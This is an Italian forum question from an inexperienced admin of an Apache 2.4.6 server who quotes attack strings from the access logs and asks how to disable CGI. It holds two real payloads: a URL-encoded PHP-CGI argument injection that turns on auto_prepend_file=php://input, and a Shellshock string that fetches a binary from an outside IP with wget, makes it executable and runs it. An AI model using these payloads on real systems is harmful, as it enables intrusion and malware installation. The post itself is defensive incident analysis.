Ho monitorato alcune strane attività nei log di accesso per il mio sito e ho notato un paio di strani tentativi contro il server. Mi chiedo se qualcuno li abbia mai visti prima. È un server Apache 2.4.6.
Il primo che ha attirato la mia attenzione era
%63%67%69%2D%62%69%6E/%7 0%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D% 64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69 %6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74 %69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65 +%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F %69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D %30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76 %3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A %2F%2F%69%6E%70%75%74+%2D%6E
Questo è un URL codificato che decodifica in
cgi-bin/%7 0hp?-d allow_url_include=on -% 64 safe_mode=off -d suhosin.si mulation=on -d disable_funct ions="" -d open_basedir=none -d auto_prepend_file=php:// input -d cgi.force_redirect= 0 -d cgi.redirect_status_env =0 -d auto_prepend_file=php: //input -n
Non sono un amministratore esperto quindi non sono completamente sicuro di cosa stia tentando di fare. Sembra che stia provando a iniettare uno script CGI in / var / www / cgi-bin che reindirizza a qualche parte, qualcuno può dirmi cosa sta tentando di fare?
L'altro che ho notato sembra un tentativo di shellshock:
"() { :; }; /bin/bash -c \"rm -rf /tmp/;echo wget http://121.12.173.173:81/9521 -O /tmp /China.Z-etryX >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-etryX >> /tmp/Run.sh;echo /tmp/China.Z-etryX >> /tmp/Run.sh;echo r m -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; } ; /bin/bash -c \"rm -rf /tmp/;echo wget http://121.12.173.173:81/9521 -O /tmp/C hina.Z-etryX >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 / tmp/China.Z-etryX >> /tmp/Run.sh;echo /tmp/China.Z-etryX >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"
La mia ultima domanda è: c'è un modo per disabilitare completamente il modulo CGI per Apache senza ricompilarlo dal sorgente? Dalla mia lettura ho trovato che c'è un flag che può essere impostato in fase di compilazione per disabilitare completamente questo modulo. Il server ospita una pagina Web statica e basta, ho davvero bisogno della configurazione minima? Qualche consiglio?